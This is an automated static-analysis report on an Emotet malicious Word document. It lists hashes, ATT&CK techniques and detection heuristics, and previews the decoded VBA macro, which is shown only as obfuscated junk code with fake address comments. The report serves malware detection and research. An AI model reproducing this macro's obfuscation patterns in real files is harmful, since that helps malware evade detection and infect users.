Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 57f050a32c6ebd5e…

MALICIOUS

Office (OLE)

Size: 244.5 KB
Created: 2019-10-09 16:49:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 370d128d3cec8248c6ad15a1bc3edd00
SHA-1: 7abf63cc726d9ae157f311e96ff9f9234d3dd2db
SHA-256: 57f050a32c6ebd5ee2dfc81069588a910df9917b9770db07d84b5242629fa012
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information
  • T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sinks, indicative of Emotet. The ClamAV signature also explicitly identifies it as Emotet. The primary function appears to be downloading and executing a secondary payload, a common Emotet behavior.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-7331197-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7331197-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present [medium] (OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  159532 bytes
SHA-256: c0b0c9b92ef79bea577bbd61f62cdb0498a697ed356c8600422fc06e8cdfa860
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "x80b04086030"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x00b00bb2429, 0, 0, MSForms, TextBox"
Attribute VB_Control = "xb43014b0x8c1, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0027x03bcb, 2, 2, MSForms, TextBox"
Attribute VB_Control = "b5312x30596, 3, 3, MSForms, TextBox"
Attribute VB_Control = "xb2c5x600x7, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c731c3202bx9, 5, 5, MSForms, TextBox"

Attribute VB_Name = "c507x958056"
Function b0x27x00x02()
On Error Resume Next
   'District97360 Larson Fords, West Wilbertstad, Pakistan Internal79165 Mitchell Overpass, Port Buckfort, Mexico
b420940001505 = False
'Direct3483 Farrell Branch, Grahamtown, Dominica Dynamic0128 Kozey Tunnel, Cartwrightview, Suriname
Select Case x49c3200800b
'Dynamic073 Roy Meadow, Irmafort, Trinidad and Tobago Dynamic84559 Kessler Unions, Tristianmouth, Uruguay
         Case c50b4453771x2
         'Product80564 Kaleb Mill, Carolview, Russian Federation Principal9232 Jacobson Knolls, Gayleland, Cocos (Keeling) Islands
         'Forward653 Christiansen Mill, West Reina, Peru International75409 Merle Canyon, South Emieport, Suriname
b81635x22050 = False
'Human15509 Torphy Square, South Cliftonborough, Monaco Customer83363 Elsa Street, Vickiefort, Mongolia
            c0230b960b0b = x02005b387149
            'Dynamic1898 Fidel Gateway, Lake Mario, British Indian Ocean Territory (Chagos Archipelago) Dynamic80250 Hilll Neck, Lake Elroyburgh, Kiribati
            x07087009207 = CInt(x025113650c67 - CByte(x73707cc12c3b))
            'Dynamic879 Mylene Burgs, South Stanton, Greece District50852 Cordell Roads, Carrollfort, British Indian Ocean Territory (Chagos Archipelago)
            x0x660005029 = Cos(bc07c886x11x)
'Regional1902 Lindgren Locks, New Elissa, Lebanon Dynamic70855 Reynolds Trace, Hirthefort, Vietnam
xx0200036b8 = False
'Central6863 Marilyne Islands, Fritschside, Albania Principal51839 Lauryn Curve, West Janick, Turkey
            c0770967c19 = Rnd(c600251095bx9)
            'Future57361 Verna Pass, Gerholdport, Micronesia Internal457 Sammie Skyway, Ibrahimburgh, Syrian Arab Republic
         Case x80026094832b
         'Future35899 Dallas Turnpike, West Amelia, Qatar Customer53536 Mariah Forge, Lake Darianaburgh, Nigeria
            cc3x03680c8 = b66cb926207
            'Global173 Carroll Inlet, Port Alvinachester, Taiwan Customer516 Willms Greens, Mavisside, Palau
            c410cc49708 = CDbl(b00b083030bc1)
            'Investor241 Hegmann Mills, Jordanestad, Dominica National677 Fritsch Meadows, South Alaynaburgh, Zimbabwe
End Select
'Direct641 Roger Estate, Kirkfurt, Maldives District7912 Dietrich Curve, West Cordeliaburgh, Uruguay
b730807c500 = False
'Internal10466 Blick Mills, South Shaniya, Equatorial Guinea Product3428 Emmerich Garden, Angustown, Bhutan
   'Investor6305 Reichel Points, West Garricktown, Antigua and Barbuda Global17206 Roslyn Villages, Abelton, Palau
c5059331580 = True
'Global05825 Schuppe Wall, Walkertown, Turkmenistan Chief30114 Moises Dale, Hintzfort, Armenia
Select Case x0c2c4700010
'Direct14104 Allison Path, West Randalburgh, Vanuatu Dynamic5351 Orrin Estate, Port Reuben, Grenada
         Case cb170b9427020
         'Senior759 Brown Tunnel, Lake Jerrell, British Indian Ocean Territory (Chagos Archipelago) Regional121 Cleveland Turnpike, New Dewayneshire, Bhutan
         'Chief898 Dedric Pass, South Maximo, Hungary Dynamic020 Guy Gateway, Annaliseberg, Argentina
bx662cc208653 = False
'Dynamic178 Bradtke Mountains, Boehmville, Liechtenstein Chief4596 Karlee Parks, North David, Virgin Islands, U.S.
            b9676c1b0889 = x06b02081078
            'Human297 Rigoberto Valley, East Esperanzashire, Maldives Investor378 Sporer Turnpike, Abdielport, Saint Barthelemy
            c3747902920 = CInt(c8
... (truncated)